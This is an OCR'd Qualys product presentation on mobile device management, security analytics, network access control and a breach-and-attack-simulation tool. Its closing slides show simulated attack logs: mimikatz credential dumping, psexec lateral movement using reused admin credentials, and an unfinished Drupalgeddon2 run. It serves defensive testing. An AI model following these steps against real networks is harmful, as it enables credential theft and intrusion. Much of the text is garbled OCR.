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Secure Enterprise Mobility © 


810 


Total Assets 


OPERATING SYSTEM 
Android 


ios 
STATUS 


Ready for Re-enrollment 
Enrolled 
De-enrolled 


MANUFACTURER 


Lenovo 
Motorola 
Apple 
Asus 


MODE 


Active 
Inactive 


OWNERSHIP 


Corporate - Owned 
Employee - Owned 


TAGS 

I Lenovo 

|| Apple 

I Motorola 

I Asus | 
¥ 2more 


DASHBOARD 


INVENTORY USER 


PROFILES CONFIGURATIONS 


Qualys Demo (quays_qd) ¥ 


| Q Search for assets Last 30 Days Y 
Action v Group assets by... v 1-10 810 + 
ΓΙ] LAST SEEN ASSET INFORMATION OPERATING SYSTEM STATUS INVENTORY TAGS 

Oct 05, 2018 10:18 AM IST — Mark Android LENOVO Android | Enrolled | Active | Android 
Corporate - Owned 7.0 865596033698730 1 more 
Lenovo TAB 7 Modified On: Oct 05, 2018 

Oct 04, 2018 06:53 PM IST ` Jack Android LENOVO Android | Enrolled - Active | Android 
Corporate - Owned 7.0 863854038393019 1 more. 
Lenovo TAB 7 Modified On: Oct 04, 2018 

Oct 04, 2018 06:46 PM IST Andy. Android LENOVO Android Enrolled — Active || Android 
Corporate - Owned 7.0 864557031194883 1 mem. 
Lenovo TAB 7 Modified On: Oct 04, 2018 

Oct 04, 2018 06:44 PM IST Jomes iOS Apple ios | Enrolled - Active | ios 
Corporate - Owned 12.0 353779083466914 1 more 
Supervised iPhone Modified On: Oct 04, 2018 

Oct 04, 2018 06:33 PM IST  Richard_i0S_Apple ios Enrolled ` Active | ios 
Corporate - Owned 11.2.5 359497088355545 1 more 
iPhone 8 Modified On: Oct 04, 2018 

Oct 03, 2018 06:59 PM IST  Michael_Android_Motorola Android Enrolled — Active || Android 
Corporate - Owned vit E 911503554758228 1 more 
Moto G (5S) Modified On: Oct 03, 2018 

Sep 28,2018 06:15 PMIST William Android Asus Android | Enrolled - Active I Android 
Corporate - Owned 7.0 358525085658221 1 more. 
ZenFone AR Modified On: Sep 28, 2018 

Sep 25, 2018 06:10 PMIST Charles Android Asus Android | Enrolled - Active I Android 
Corporate - Owned 731 351558072379425 TEM 


ZenFone Zoom S 


Modified On: Sep 25, 2018 


o x 


m^ 
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< Asset Details: Station10_Tab1_LE 


VIEW MODE 
Peu Asset Summary 
System Information 
Network Information Station10 Tab) LENOVO Rename 
Android v7.0 
Kë Lenovo Manufacturer / Lenovo TB-7504X 
CA Certificates 
Security Tokens Status GRC Unauthorized Root Access 
Logs -Enrolled ` [Non-Compliant ess 
Location Passcode Present Encryption Profiles 
Acts ET cM 9 
Identification Activity 
Asset Name : Lenovo TB-7504X Last Seen : Nov 14, 2018 12:05 PM PST 
Status : Enrolled Enrolled On: Oct 9, 2018 11:29 AM PST 
Mode: Active Modified On: Oct 10, 2018 11:29 AM PST 
Ownership : Corporate - Owned 
Last Location 
Communication Mode : Push 
Passcode: Not present 
Encryption : Yes 


Unauthorized Root Access: No ` NS A 
Fuquay-Varina, North Carolina United States 


Username : fCgbjBD5 Last Seen: Nov 14, 2018 12:05 PM PST M 

IP Address: 71.65.232 14 : 
User Email : - 2 
Enrolled with AFW : Yes 


ما 
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< Asset Details: Station10_Tab1_LENOVI 


VIEW MODE 

CA Apps 

System Information 

Network Information Q Search for apps 

Apps 

mM Recommended Apps 

Security Tokens 

Logs NAME IDENTIFIER VERSION SYSTEM APP STATUS DETECTED ON 

Location Auto Service Booking com.acme.auto.service.booking 1.1 (2) Νο . Missing - Nov 09, 2018 09:30 PM PST 
Actions ACME Customer Feedback com.acme.cust.feedback 1.0 (1) No Found Nov 09, 2018 09:30 PM PST 


Device Apps (13) 

1-13 of 13 
NAME IDENTIFIER VERSION SYSTEM APP USES MOCK LOCATION INSTALLED ON ACTION 
TeamViewer com.teamviewerteamviewer.marke... 14.0.35 (140035) No No Nov 09,2018 04:37 PM PST Uninstall 
Inkwire com.koushikdutta.inkwire 1.0.1.7(1499133600) No No Nov 09, 2018 04:23 PM PST uninstall 
Gboard com.google.android.inputmethod.la.. 7.7.12.219989447 (2... Yes No Nov 09, 2018 12:49 PM PST 
Gmail com.google.android.gm 8.10.21.220187835.... Yes No Nov 09, 2018 12:49 PM PST 
oneAssistant nfo.oneassist V25 (25) No No Nov 09, 2018 12:32 PM PST Uninstall 
Home com.google.android.apps.chromec... 2.6.6.19 (20606190) No No Nov 09, 2018 10:12 PM PST Uninstall 
Maps com.google.android.apps.maps 10.3.1 (1003101040) Yes No Nov 08, 2018 10:26 PM PST 
Google Play Movies & TV com.google.android.videos 4.8.20.18(40820181) Yes No Nov 06, 2018 10:40 PM PST 
Gallery com.oneplus.gallery 2.10.10 (22270465) Yes No Nov 06, 2018 10:40 PM PST 
Drive com.google.android.apps.docs 2.18.432.04.40 (1843... Yes No Nov 06, 2018 10:39 PM PST 
SnoopSnitch de.srlabs.snoopsnitch 2.0.7 (35) No No Nov 05, 2018 12:02 PM PST Uninstall 
YouTube com.google.android.youtube 13.44.51 (134451340... Yes No Nov 05, 2018 11:38 PM PST 


onferenci 


Google Play Store com.android.vending 12.4.14-all [0] [PR] 21... Yes No Nov 05, 2018 11:35 PM PST 


Security 


Vulnerability Management 


Asset Lockdown 


Asset Hardening 


Enterprise Integrations 
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Protection 


Compliance Policies 

- On Enrollment 

- Continuous Monitoring 
Enforcement and Remedial Actions 


Policy Management 


Containerization 
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< Asset Details: Station10_Tab1_LENOVO 


Asset Summary 
System Information 
Network Information 
Apps 

CA Certificates 
Security Tokens 
Logs 

Location 


Actions 


Actions 


Locks the screen of the asset. Asset will be unusable until it is unlocked. 


Send a message to the user of the asset. The message will be sent as a Push Notification. 


Poll Mode: Asset will communicate to the Qualys server after the specified regular interval. 


Push Mode: Qualys server will communicate to the asset only when a new action is scheduled for the asset. 


Asset will buzz and current geo-location will be sent to the server, provided Location Services are enabled. 


Sync on demand asset information. 


Asset will be de-enrollded and server will not be able to communicate with the device. Also, corportae data on the 
asset will be deleted. 


Asset will be factory reset. Server will no longer be able to communicate with the asset. 


DIY Portal 
Audit Control 
Privac 
y Ownership (Corporate/BYOD) 


Transparency 


© Qualys. 


Feb 2019 - Closed Beta 


Roadma 
p Multiple releases during 2019 
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Security Analytics & Orchestration 


Security Analytics & Orchestration 


Human Guided Policy-Driven Response Correlation Cross-Product Correlation 
Response & & 


— Molde e214 (eal Mall 


Additional Context from 34 Party 
Playbooks for Bi-Dir Ecosystems Sources 
Integration 
Detect KNOWN threats w/ out-of- 
BYOP- Bring-Your-Own-Playbook box rules 


Advanced 


Analytics 


Detect UNKNOWN threats Using Machine Learning 
Hacker Behavioral Analytics 
Predictive & Prescriptive SoC 


13 © Qualys. 


Security Analytics & Orchestration Apps 


ML/AI Service Orchestration & Automation UEBA 
Patterns | Outlier | Predictive SoC Ecosystems Integration | Playbooks | User & Entity Behavior Analytics 
Response 


Threat Hunt Security Analytics Advanced Correlation 
Search | Exploration | Behavior Graph Anomaly | Visualization | Dashboard Actionable Insights | Out-of-box Rules 


Qualys Security Data Lake Platform 


Data Ingestion | Normalization | Enrichment | Governance 


© m E CONAI] © 


Network Security Server Endpoint Qualys Apps Apps Cloud 


Qualys Quick Connectors 


14 © Qualys. 


Characteristics of Data Lake 


Collect Anything Dive in Anywhere Flexible Access 


Future Proof 


What is Security Data Lake? 


Single data store (single source of truth) 
Structured and unstructured data 


Data is transformed, normalized, and enriched 


Threat Intelligence feed integration, GeolP etc. 
Data has governance, semantic consistency, and access controls 


Store-once / Process-once / Use-multiple 
Apps, dashboards, data analytics 
Cross product search, reporting, visualization 
Machine learning, forensics, etc. 
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Simplified View 


SECURITY 
LOGS FROM 
MULTIPLE 
SOURCE 


BEHAVIOR 
ANALYTICS 


CLOUD THREAT 
CONNECTORS HUNTING 


SECURITY 


1 B ANALYTICS 


RESTFUL API 


1 8 SERVICES 


LOG 
CONNECTORS AUTOMATION 


ORCHESTRATION 


3RD PARTY 


QUALYS SECURITY DATA LAKE PLATFORM INTEGRATION 
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FIM, IOC, Patch 


Cloud Agent 


Qualys Apps 


Graphs/Topology Reports Dashboards Search & correlation | cyber eat hunting | threat hunting 
Orchestration, Automation & Alerting ο | Anomaly detection | detection User & entity behavior analytics 
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imension Normalize 
Aggregation 
ML Meta data Enrichment 
sync pipeline 


processing 


Agenda 


What is Secure Access Control 
Use-cases 

Capabilities 

Policy-based orchestration 
Operationalizing Secure Access Control 
Mockups 
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Use Cases 


Block vulnerable assets from accessing 
critical network resources 


Lirnit access (e.g. quarantine) of 
vulnerable assets 


Grant access to resources only on a 
need basis. Block everything else 


Automated asset attribute processing 
and enforcement without the need for 
manual action 


Use Cases 


| ©) Vulnerabilities - Quarantine assets if vulnerable 


Quarantine 


Vulnerability Found 


Remote Data Center 


LDC-01 
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*.windowsupdate.microsoft.com 
http://*.update.microsoft.com 
https://*.update.microsoft.com 
http://*.windowsupdate.com 
http://download.windowsupdate.com 
http://download.microsoft.com 


DHCP Active http:// | 
Server Directory Wi ndows iz 
tats.update. osoft.co 


Enterprise 


Servers 9 Qualys, 


EE 


Use Cases 


Asset Inventory - Access control using asset inventory attributes 


CC Aa اک‎ | | 
E pra TE Attributes 

| ١ 5 By Aa ! 
| ela i System Information ! 
| ١ ManagedAssets | Hardware 
| tssssssssssessssessessss i Operating System 1 
|  possssssssssssssssssssss Services 


| | | Network Interfaces 
ER ZS, | Open Ports i 
١ Ol DE i Software Inventory 
| 4 iL. Bh Aa | Software Lifecycle 


١ ¦ Unmanaged Assets 


CMT‏ ي ي 


E 


Block 


Allow 


Quarantine 


Assign ACL 


Assign VLAN 
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Use Cases 


e Compliance - Block assets which fail compliance 
et 


Controls 
e Ææ Compliance Mandates Q Block 
Control Policies 


Family 
| <<< o Malware Category 


Score 


E A Allow 


l 1 1 

ας. 1 

ti i 

|] SE 1 Indications of File Network 
ΙΙ IA INTERNET wn ! a 7 Process Registry - 
1! THINGS. i =| i Compromise Mutex Incidents — N Quarantine 
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Managed Assets ACL : 
E TS = [5] Assign ACL 
Threat Actively NE ERE — 

Protection σας Exploit Kit 

| E Easy Exploit S 
e > Assign VLAN 
[ : : Action Target 

File Integrity Actor Incidents 
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Policy-based Orchestration 


Security Control 
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Policy-based Orchestration 


Access Control 


Assets 
6F:1A:5E:2B:4D:3C 
Server.company.co 
m 
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Best of Two Worlds 


Reliable first hand data 


In-Line Appliance enforces SAC offers both modes 


Appliance Low latency for data collection 


& enforcement 


Powerful Together 
Out of Multiple enforcement options Unique Value Proposition 
Band Traffic volume agnostic 


Switches 
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Operationalizing Secure Access 
Control 


Qualys 
Hardware + SSN 
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ETTI 
i 4 D Modem D | 
m ὶ - CT ELT ο — 77 
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Ss ۳ 7 ο Acces sngineering rese for engineering team [> © Action Set 322 
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SAC 


Secure Access Control 


How do | trigger SAC Policies from Qualys Cloud Apps ? 
How do | view and define policies? 
How do | troubleshoot an asset? 


1 


Trigger 


© Qualys. Enterprise 


Indicators of Compromise DASHBOARD HUNTING INCIDENTS ASSETS RULES g-frame-standard (123) © تع‎ 


Alerts 


Q Search Last 30 days = 
64K x 
Total Events 05 
04 i 
0 
May 15 May 30 Now 
TYPE ο 1. 3 
file 1.4K 
mutex 300 TIME OBJECT ASSET SCORE 
network 200 
process 300 a minute ago déi WmiPrvSE.exe 58 WIN8-1-UN-PATCH 
registry 100 12:10:17 AM C:\Windows\system32\wbem\wmiprvse.exe 10.115.76.190 
y 2 more 
7 8 minute ago 8 \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... 58 WIN8-1-UN-PATCH 
EVENT ACTION 12:10:17 AM taskhost.exe 10.115.76.190 
connected 400 a minute ago Fei SearchProtocolHost.exe as WIN8-1-UN-PATCH 
created 300 12:10:17 AM C:\Windows\system32\SearchProtocolHost.exe 10.115.76.190 
deleted 200 
disconnected 123 a minute ago Pad undefined : 0 Quick Actions v H WIN8-1-UN-PATCH 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe 10.115.76.190 
SCORE Event Details 
a minute ago déi taskhost.exe mm  WIN8-1-UN-PATCH 
10 564 a: UE Asset Details "um 
8 421 12:10:17 AM C:\Windows\system32\taskhost.exe 10.115.76.190 
4 300 we R 
a minute ago Ped undefined : 0 mm  WIN8-1-UN-PATCH 
3 288 Quarantin = 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe uaranune 10.115.76.190 
n Delete File 
Processor 164 a minute ago déi SearchFilterHost.exe go WIN8-1-UN-PATCH 
Memory Ka 12:10:17 AM C:\Windows\system32\SearchFilterHost.exe 10.115.76.190 Qualys. 
HDD E We ` μα. 


Quarantine Asset 


Show brief information about this heading 


Policy 
|)» Auto Create New Policy 0 Select From Existing Policies 


Policy Name 


Select 


Qualys. 


Quarantine Asset 
Show brief information about this heading 


Policy 
(© Auto Create New Policy 0 Select From Existing Policies 


Policy Name 


| 
| Select 


Quarantine for all MacOS 
Policy to quarantine all macs OS vulnerability 


Block all wannacry 
Policy to block all waanaCry vulnerable assets 


Quarantine Policy for QSC 
Policy to block all QSC vulnerable assets 


Qualys. 


Quarantine Asset 


Show brief information about this heading 


Policy 
و‎ Auto Create New Policy ` ` ` Select From Existing Policies 


Policy Name 


Quarantine policy for Asset: 10.19.57.65 


Description 


This is an auto created Quarantine policy for Asset 


Qualys. 


2 


View & Define 
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Secure Access Control - DASHBOARD POLICIES MONITORING CONFIGURATION John Doe (jdoe_quays)¥ @ i 


Policies Policies 


Q Search 


Total Policies D | Actions v 1-50 of 79 G+ oS 


SEQ.NO. STATUS POLICY HOSTS RULESET ELIGIBLE ON ASSETS 


STATUS 1 | Enabled | Quarantine Policy for QSC σι © 48 
Enabled 07 VLAN 20 High Vulnerability Mac 
Disable 05 
2 | Enabled ^ Automatic Policy for Asset: 10.19.57.65 E ® 22 
DYNAMIC ASSET CRITERIAS ACL ACL Name example WannaCry Assets Criteria 
High Vulnerability Mac 2 
All Corporate Assets 2 
Al i Fe 1 3 | Enabled  Quarentine all Mac OS High Sierra Vulnerability... ® © 48 
All Linux Assets 2 VLAN 20 High Vulnerability Mac 
All Mac Assets 2 
All Laptops 1 3 | Enabled Block all WannaCry Vulnerable assets ې‎ ® 29 
ACL ACL Name example WannaCry Assets Criteria 
da E LIST 5 4 Enabled - Notify all Heartbleed Vulnerable openSSL servers ® © 35 
Management Assets 2 Traffic Rules Quarantine Ruleset Heartbleed Asset Criteria 
All Printers 1 
IOT Devices 2 5 ` Enabled | Quarantine VLAN if OS is not updated ® © TA 
Blacklisted Hosts 2 Traffic Rules Ο5 Update Check Ruleset Assets Missing OS Update 
Blacklisted Mac Addresses 1 
6 | Enabled | Quarantine VLAN if Antivirus is not updated Γι © 11 
RULE TYPE Traffic Rules 65 Assets Missing AV Updates 
Outbound 05 
Inbound 07 7 | Enabled Access to engineering resources for engineering team πι © 322 
Traffic Rules 65 High Vulnerability Mac 
ACTIONS. 
Allow 07 8 | Enabled ^ Policy for feedback Kiosk at reception σι © 123 
Deny 22 Traffic Rules 3 Rules High Vulnerability Mac 
VLAN Switch. 16 
9 | Enabled ^ Block all outbound connections to Chinese servers mo 123 
SERVICE Traffic Rules 3 Rules High Vulnerability Mac 
HTTP 05 
SSH 07 
ANY 22 10 Enabled | Deny acccess to all vulnerable laptops EB © 72 
UDP 16 Traffic Rules — 3 Rules High Vulnerability Mac 
PROTOCOLS 11 | Enabled ^ Quarantine Vulnerable servers CD © 48 
TCP 05 Traffic Rules 3 Rules High Vulnerability Mac © Qualys. 
UDP 07 


WannaCry Asset Criteria ۶ 


Something about what the user will need to know about the fields below. 


Hosts/Assets 
Compliance Malware 


ved Crit 
© Custom Criteria 


sO 


Vulnerability 


Lh Custom Criteria 


EM © Qualys. 


© Qualys. 


€— Create New: Criteria 


Criteria 
SONO 
CX 

User Hosts/Assets Vulnerability 
Compliance Malware Location 
Saved Criterias 


| © Custom Criteria 


E Custom Criteria 


WannaCry Asset Criteria ۶ 


Something about what the user will need to know about the fields below. 


^ Rule 1: New or Active Vulnerability 


When a vulnerability is 


— New. | Fixed {v Active | Reopened 


Select Criteria — ^ 


A Users 


Ll Hosts 

© Vulnerability 
© Compliance 
®© Malware 


® Location 


© Qualys. 
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€— Create New: Criteria 


Criteria 
Ee ته‎ 
User Hosts/Assets Vulnerability 
Compliance Malware Location 
Saved Criterias 


| © Custom Criteria 


E Custom Criteria 


WannaCry Asset Criteria ^ 


Something about what the user will need to know about the fields below. 


^ Rule 1: New or Active Vulnerability 


When a vulnerability is 


— New. Fixed v Active | Reopened 


Vulnerability Criteria 
Type 
| Confirmed — Potential 


Severity 
mz u mG Mu 


Title 
Select v 
QID 
Is in the list v 1027 
CVE 
Select v 
CVSS Score 
Select v 
+ Add Criteria 


3 


Troubleshoot 
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Secure Access Control ~ 


DASHBOARD POLICIES MONITORING CONFIGURATION 


John Doe (jdoe_quays) vr @ ته‎ 


Monitoring 


XX. interfaces.address “10.19.57.65” 


79 = 


Total Devices O 


1-50 of 79 o + & 


POLICIES 
ASSETS OPERATING SYSTEM LAST ACTIVITY STATUS LAST POLICY APPLIED ENFORCED ELIGIBLE 
EI WIN8-1-UN-PATCH Microsoft Win... john@quays... | Online - Allow Internet Access 5 6 
10.19.57.65 6.1 SP1 05:10:22 AM 
Host name here 


© Qualys. 
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< View Details: WIN- 4HBLJP02 


VIEW MODE 


System Information 
Agent Summary 
Network Information 
Open Ports 

linstalled Software 
Vulnerabilities 

Threat Protection 

File lintergirty Monitoring 
Indicator of Compromise 
Patch Management 


Security Access Control 


Asset Summary 


` WIN-HL64HBLJPO2 Rename 
α Microsoft Windows 7 Enterprise 6.1.7601 Service pack 1 


VMware, Inc. 


Vulnerabilities 


188 
E JA 


Security risk (Avg): 3.4 


IOC Incidents 


FIM Events 


17.2M 


Delete 1.5M Attributes 240 
Create 1.4M Rename 186 
Content 1M Security 112 


Policy Compliance 


73% 
| 


Passing compliance (Avg): 73% 


SSL Certificate Grade 


2 Failing | 1 06 


Missing Patches 


6 
EB e 


Identification: 


DNS Hostname:  WIN-HL64HBLJPO2 

FQDN: WIN-HL64HBLJP02.WORKGROUP 
NetBIOS Name: WIN-HL64HBLJP02 

IPv4 Addresses: 172.31.38.237 


IPv6 Addresses: ^ fe80:0:0:0:9c26:6441:5eaa:796e 


Asset ID: 35046941 
Host ID: 28845831 
Activity: 


Last User Login: AKCtech 
Last System Boot: September 9, 2017 4:51 PM 
Created On: March 1, 2017 10:33 AM 


Last Checked In: 8 Mins ago 8:32 AM 


Last location: 


Columbus, Ohio United States 
Last Seen: 8 Mins ago 8:32 AM 
Cloud Agent IP address: 52.14.169.187 


v. ? 
Tags: 


[Test Group laws | cloud Agent | Amazon 
| US East l Patch Test AWS Servers 


© Qualys. 


€— View Details: WIN-HL64HBLJP02 


VIEW MODE 
Summary 


System Information 


Agent Summary 
Network Information 
Open Ports 

linstalled Software 
Vulnerabilities 

Threat Protection 

File lintergirty Monitoring 
Indicator of Compromise 
Patch Management 


Security Access Control 


Security Access Control 


Allow internal server access to all e... 


Allow internet access to all employe... 


Nov 09 , 2018 at 9.17 AM 


Nov 09,2018 at 9.15 AM 


Prevent access to finance and payroll server 


Quarantine VLAN if Antivirus is not updated 


Today 
POLICY TIMELINE 
PS Oct 12, 2018, 2:13 AM 
P4 ο e e Quarantine Policy Applied... e 
P3 * ee e = τ DO o 
Da | nn e. δ. 
9:00 AM 1.00 PM Now 
POLICY ELIGIBILITY TIMELINE 
PS 
P4 . . 
P3 e 
P2 . : 
mo? 
9:00 AM 1.00 PM Now 
LAST 5 ENFORCED POLICIES NEVER ENFORCED ELIGIBLE POLICIES 
POLICY NAME TIME POLICY NAME 
Access to engineering resources fo... Nov 09 , 2018 at 10.05 AM Outbound connections to malicious websites 


© Qualys. 


Problems 


Lack of confidence in the effectiveness of security 
controls 


Limited assessment scope and capabilities 


Red Team operations are expensive, not scalable, and 
not evaluated for completeness 


Blue Teams are blind towards the impact of new 
exploits and attacks on their existing security controls 


© Qualys. 


© Qualys. Enterprise 
Breach and Attack Simulation 


DASHBOARD SCANS ASSETS CAMPAIGNS 


mdani (admin271) 


Breach & 
Attack 


| Filter by Asset Tags | | Last 30 days 


TOTAL ASSETS BREACHED AVAILABLE CAMPAIGNS TECHNIQUES 


943 ۳ 20 séries 2638 css 


Simulation 


Automated simulation 


of real-world ۹ 


IO. Execution Persistence "lege Defense Credential Discovery colleeton مه‎ Command 
p p ASSET BREAKDOWN BY SEVERITY TOP 5 FAILING TECHNIQUES 
AT] πο k 
&C K ra CWO r 1.1K Application Shimming 65 { Ho | 
. Total 
ous s ET Exploit Public-Facing Application 84 ELEM 
« 100 Logon Scripts 83 =m 
200 
Email Collection 73 tow 
File System Permissions Weakness 64 | Medium | 
SCANS BY STATUS MOST FAILING CAMPAIGNS 
weakness.exploit.msword.phish Jan 01, 2018 65 
22 Total 
és e exploit. compliance.eternalblue Feb 15, 2018 84 
: weakness.compliance.password.reuse Jun 02, 2018 83 
exploit. vulnerability.drupalgeddon2 Aug 23, 2018 73 


٠ه‏ پخ ېي 


TACTICS OVERVIEW BY FAILING TECHNIQUES 


11 Tactics 
vs. 187 scanned techniques 


82 


33 


Technical Approach 


Automated simulation of real-world ۹۹ 
Scale security assessments across the entire enterprise 


Transition towards a defense strategy based on offensive 
technigues 


Real-time insights mapped to MITRE ATT&CK'" 
framework 


Continuously measure security control drift over time 
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Qualys Breach and Attack Simulation (v0.1) 


Breach & m 
Attack zs noe 


Connect to an agent 
List connected agents 


e e 
Show this help menu 

1 1 | IU 0 1)( 1 | i Kill an active agent connection 
List files in current directory 


Get current working directory 
Unzip a file 


Gee Mies a file from the asset 

l pload a file to the asset 
interface to adversary 

agents Πω nn | na Qualys Show IP-MAC pairs from system ARP table 


Execute a command on the asset 


Cloud A ent Scan and show status for top 1024 TCP ports on the asset 
Q Collect metadata about the asset 


Cleanup all traces of agent from the asset 
Exit the current agent connection 


T1190 - drupalgeddon2 Run the Drupalgeddon2 exploit 
T1190 - apachestruts Run the Apache Struts S2-057 exploit 


Execution: 
T1035 - psexec Run Psexec for command execution 
T1191 - cmstp Run CMSTP.exe with a malicious .inf file for file execution 


T1173 و‎ windde Use DDE to run arbitrary commands 


Persistence: 


kerberos 
* Username : vswin2k8r2sp1be$ 
* Domain ` WORKGROUP 


* Password : (null) 
ssp : 
credman : 


imikatz(commandline) # exit 


Att k » 
ac [20/Nov/2018] 13:58:31 PM [T1003] [INFORMATION] : 


[20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz.exe (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb 
0c27f) 


e © 
[20/Nov/2018] 13:58:33 PM |[T1003 ] [ INFORMATION Passwords extracted: 4 
| | 1 | | 0 1)( 1 | [20/Nov/2018] 13:58:34 PM [T1003] [INFORMATION]: Test successful 


(agent #1) >>> cache 
: " *] Showing current cache: 
C d | 1 [+] passwords: 
recentiall Harvesting mes 

ype: tspkg 

= ne Reuse sername: Administrator 
Password: AbcCXxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 

ype: wdigest 

sername: Administrator 
Password: AbcCXXxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 
ype: kerberos 
sername: Administrator 


= em Tc 
3. Lateral movements EES REESE 
Domain: VSWIN2K8R2SP1BE 


ategory: application:proxy 

ype: credman 

sername: Administrator 

Password: AbCXXXXXXX5 
VSWIN2K8R2SP1BE 


Breach & 
Attack 


Simulation 


Credential Harvesting 
and Reuse 


1. Uploading / running 
mimikatz 


2. Extracting stored credentials 


Domain: VSWIN2K8R2SP1BE 


Category: local 

Type: wdigest 

Username: Administrator 
Password: 65 
Domain: VSWIN2K8R2SP1BE 


Category: local 

Type: kerberos 
Username: Administrator 
Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


Category: application:proxy 
Type: credman 

Username: Administrator 
Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


(agent #1) >>> lateral 

[20/Nov/2018] 14:32: PM [STATUS]: Testing for T1077: Windows Admin Share 

[20/Nov/2018] 14:32: PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102 
20/Nov/2018] 14:32:30 PM [T1077][INFORMATION]:[Windous admin$ share detected on 192.168.1.101| 
20/Nov/2018] 14:32:31 PM [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102 
[20/Nov/2018] 14:32: PM [T1077][INFORMATION]: Admin shares enumerated 

[26/Νον/2618] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts 

[20/Nov/2018] 14:32:34 PM [T1078][INFORMATION]: Testing for passwords retrieved using T1003 
[20/Nov/2018] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101 

[20/Nov/2018] 14:32:36 PM [T1078][INFORMATION]:|Credentials detected administrator: AbDcxxxxxxx5 | 
[20/Nov/2018] 14:32: PM [STATUS]: Attempting lateral movement using re-used credentials 

[20/Nov/2018] 14:32: PM [STATUS]: Testing for T1035: Service Execution 

[20/Νον/2018] 14:32:38 PM [T1@35][INFORMATION]: Read psexec.exe location from configuration: \\software\ 

psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095) 

20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds3 

45gfgd.exe \\192.168.1.101\c$\ 

[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION] command psexec.exe|-accepteula -nobanner -d \\19 

2.168.1.101 -u administrator -p Abcxxxxxxx5 s345gtg 

[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Test successful. 

[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe 

[28/Nov/2818] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3 

a095) 

[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete. 


(agent #1) >>> 


© Qualys. Enterprise 
Live View: Password Reuse ΚΞ | bone | 


Search Options 


Q Search... 


IDENTIFICATION TACTICS BREAKDOWN BY STATUS 
Scan: Password Reuse 100 


Campaign: weakness.compliance.password.reuse 50 ΕΞ — seg μα 
Status: InProgress نس‎ 34% B 


TACTICS ۱ 
Initial Access \ س‎ Bel 


x 192.168.1.104 
Execution سے‎ @ —.9 
Rereaianca i 192 140 1 102 LO سم‎ 192.16B.1.106 


Privilege Escalation 


PERTE | OA IP: 192.168.1.101 View details 


Hostname: THINKPAD-98689-M710 


X^ 6more 


Username: CORP/user1 192.168.1.7 


Processor: Intel (R) CORE(TM) i7-7770 


STATUS 


Breached — : — p... 1 
Safe 192.168.1.100 —— 192.168.1.101 rivileges. administrator 
Error 


OPERATING SYSTEM ΜΙ e 


Windows 2012 Server 

Windows Server 2012 R2 --. 192.168.1.105 
Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 


192.168.1.107 


CX. | Breached ` 192.168.1.101 — THINKPAD-98689-M710 


[11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe 
[11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601) 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB 


Breach & 
Attack 


Simulation 


Drupalgeddon2 


(CVE 2018775900) 


>>> use 1 


[+] Opening up live session with agent #1 (192.168.1.100) 
(agent #1) >>> drupalgeddon2 
Please provide a 


[20/Nov/2018] 
[20/Nov/2018] 
tld/blog 
[20/Nov/2018] 
NGELOG. txt 
[20/Nov/ 2018] 
-2018-7600 
[20/Νον/2018] 


15. 
13: 


URL for a public facing Drupal webapp (https://corpdomain.tld/blog): 


54: 
54: 


154: 


154: 


154: 


7b8b6a7ed2bbf@c29g) 


[20/Νον/2018] 
[20/Νον/2018] 
[20/Νον/2018] 
7ed2bbf@c29g) 
[20/Νον/2018] 
[20/Νον/2018] 
[20/Νον/2018] 
[20/Nov/ 2018] 
[20/Nov/2018] 
[20/Nov/ 2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 


Edition 3.00. 


[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
RNALBLUE 

[20/Nov/2018] 
[20/Nov/2018] 


(agent #1) >>> 


13: 
13: 
13: 


13; 
13: 
13: 
15. 
13: 
13: 
13: 
15. 
13: 
13: 
13: 
13: 
30. 
13; 
13e 
13: 
13: 
13: 
13: 
13: 
13: 


13: 
13: 


54: 
54: 
54: 


54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
55: 
55: 
55: 


55: 
55% 
554 
555 
55: 
τοι 
55 
55: 


τη; 
55; 


50 
50 


50 


50 


10 


PM 
PM 


PM 


PM 


PM 


PM 
PM 
PM 


PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 


PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 


PM 
PM 


[STATUS]: Testing for T1190: Exploit Public-Facing Application 
[T119@][INFORMATION]: Found public facing Drupal web host: https://corpdomain. 


[T1190][INFORMATION]: Drupal 7.46 detected | via https://corpdomain.tld/blog/CHA 


